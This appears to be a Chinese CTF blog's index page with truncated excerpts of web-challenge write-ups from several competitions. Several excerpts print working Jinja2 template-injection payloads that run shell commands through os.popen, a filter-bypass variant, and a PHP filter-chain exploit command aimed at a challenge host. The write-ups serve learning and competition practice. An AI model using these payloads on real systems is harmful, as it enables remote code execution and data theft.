hgame2025
webPacmanhttps://deobfuscate.io/反混淆
BandBomb上传文件改名为模板,实现覆盖
MysteryMessageBoard和网鼎青龙组的很像
双面人派对prodbucket
逆向在字符串李搜索可以发现存储桶的账号密码用的是minio的分布式存储桶,这里我使用其官方工具mc进行连接12mc.exe config host add minio_admin http://node1.hgame.vidar.club:30407
连接上后就可以看到hint里是一个源码。可以发现是一个使用overseer来自更新program函数的程序,而更新的Fetcher就是minio prodbucket的update程序。那么我们只要将program重写成危险函数再传到update就可以了就可以了
角落https://blog.wm-team.cn/index.php/archives/82/配置文件错误,源码读取
发现路径/app.conf发现apache配置有问题,可以进行源码读取
123456789101112131415161 ...
出题
143d5673a003b6feb710e92aa9ea18c2e9a45deb4ad7a8d5a96100e95eddb6d58f443b8e61547fabbb6d0e456f048a7a619bb5de79a589801b9e68e9caf3a5fa7ab9c0be03168a2cf0196736eb39cfb9924ce0f65c7b3cf27553040716c874fece6816ac123e7aff25b39b933c4d3cf56d08bc6d0a0c1eda1e87be0af8525875027683fdd514017fbac7b47e506094494cbaa333f3490c4ec2569aa055d9a81d43b257afc6c83c726b54320356695f53e9b60761f912ad4361a9e64be87327170bab30e6f1dc3eb57c3f1cb091b807954d740c12a1c4efe4e9072ef1efd915a4f3c1fed26bc3553cc8544997b5208813c4f5366b83c9fcf07 ...
西湖论剑
Rank-l登陆时可以发现其输入用户名和输入密码是在不同路径下的。
在经过尝试可以发现在登陆页面输入一次用户名,服务器会将其保存,后面输入密码时,如果错误会回显用户名因为是py所以尝试使用ssti
经过尝试可以发现,在用户名处存在ssti其过滤了一些特殊符号如/ * ;等。这里我使用equest.args.x1来进行绕过1phone_number={{g.pop.__globals__.__builtins__['__import__']('os').popen(request.args.x1).read()}}phone_number={{g.pop.__globals__.__builtins__['__import__']('os').popen(request.args.x1).read()}}
easydatalog下载查看日志可以发现其为使用蚁剑所记录的日志。一步步看下去可以发现用蚁剑传了一张jpg图片 ...
chuqiubei
easy_flask
登录框输入{{7*7}}发现是ssti,且变量可以从浏览器看出为user直接ssti即可。1?user={{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('cat /app/flag').read()}}
file_copy
从报错可以看出其是使用copy函数来处理文件。我们可以使用php_filter_chains_oracle_exploit一把梭https://github.com/synacktiv/php_filter_chains_oracle_exploit
1python filters_chain_oracle_exploit.py --target http://eci-2zebps6z31jiqnksgy5t.cloudeci1.ichunqiu.com:80 --file /flag --paramet ...
培训
f51580de2b407268e91f2ffb343c94f122640b7b9c0287203fae2c0565cf19becd69f88c59abe3f3713d4df0a9c75163884d1460e582e997cb843fcaa6e1ece5645112fd27cef59b0422bd65b61c7f2f0ccb92af94c74b86875d8ef9610f734f52cec6787bef63b620a79f00848243efea8cb6a7abc9d6aa229520aa3d32108971725ed8c0e1b63439cdd49c170772f2178db526a22e5051c98f2e6f9c94c85829a9cb3aa677ac375cd7a2752823464f7f6c40520f41aa75fe3a4620117b9e2da8796e2bb1e71108512af19681bfc930de577ee5d10316c2c68354f2e81500690e6a03b6b1db824e3108b26009c300721ac9887723e66d268 ...
软件系统安全赛
CachedVisitor
审计代码可以发现ssrf漏洞盲测也可以测出来,因为环境有redis,所有考虑使用ssrf来打redis。1234567891011121314151617181920212223242526local function execute_lua_code(script_content) local lua_code = script_content:match("##LUA_START##(.-)##LUA_END##") if lua_code then local chunk, err = load(lua_code) if chunk then local success, result = pcall(chunk) if not success then print("Error executing Lua code: ", result) end els ...
ctfshow 渗透赛
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db1bc8e2652128ee964de3d3465414fcbc4a735b880e731490e9842e56244728385b1e883d067fa137fa0120a4789fd213a1b03d6face5045c20513d17088426dd033ad9fbebd8ab106e2345911ac0f290589d5b91a9e4161969a31ce72e59e2282caf44dce7a0e5d4211083a05dd19fca8f0bb397c010d43e5222f6f83f3b22b8e7777f0cb9ed299b8aabe79dba60744dd1c9cd5a40a779c0d9cc2a8be98855f238a7dd8c7c2891a5465cdb70dd8d63cc0f66bada9d91bdaad286f61c0cd2936546fb123266d1582028e8d4be0c28080b9004c22c7d724d60ed ...
从DAS的strange_php开始探究PDO在反序列化中的利用
平常上课都没听,最近都忙着速通期末都没时间来更博客了。PDO首先就是pdo的一些操作了。pdo是php中用于sql查询的类,一般开发者会对利用pdo来封装一个sql查询的类。
DASCTF 2024最后一战|寒夜破晓,冬至终章个人wp
周末一个人简单打了一下DAS
webconst_python1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192import builtinsimport ioimport sysimport uuidfrom flask import Flask, request,jsonify,sessionimport pickleimport base64app = Flask(__name__)app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "")class User: def __init__(self, username, password, auth=&#x ...
CISCN&铁三-web
国内网安实在是太强辣,最后10分钟直接掉一百来名捏😠Safe_proxy
看源码可以发现器/路由存在ssti,并且为无回显的ssti。这时有两个思路,内存马或者打回显。我这里打算打500报错回显比较方便打内存马相对要绕的会比较多python flask 新型回显的学习和进一步的深入
因为waf禁了__,popen sys os等我这里选择拼接绕过
1code={{url_for["_"+"_globals_"+"_"]["_"+"_builtins_"+"_"]['setattr'](((lipsum['_'+'_spec_'+'_']|attr('_'+'_init_'+'_')|attr('_'+'_globals_'+'_'))[' ...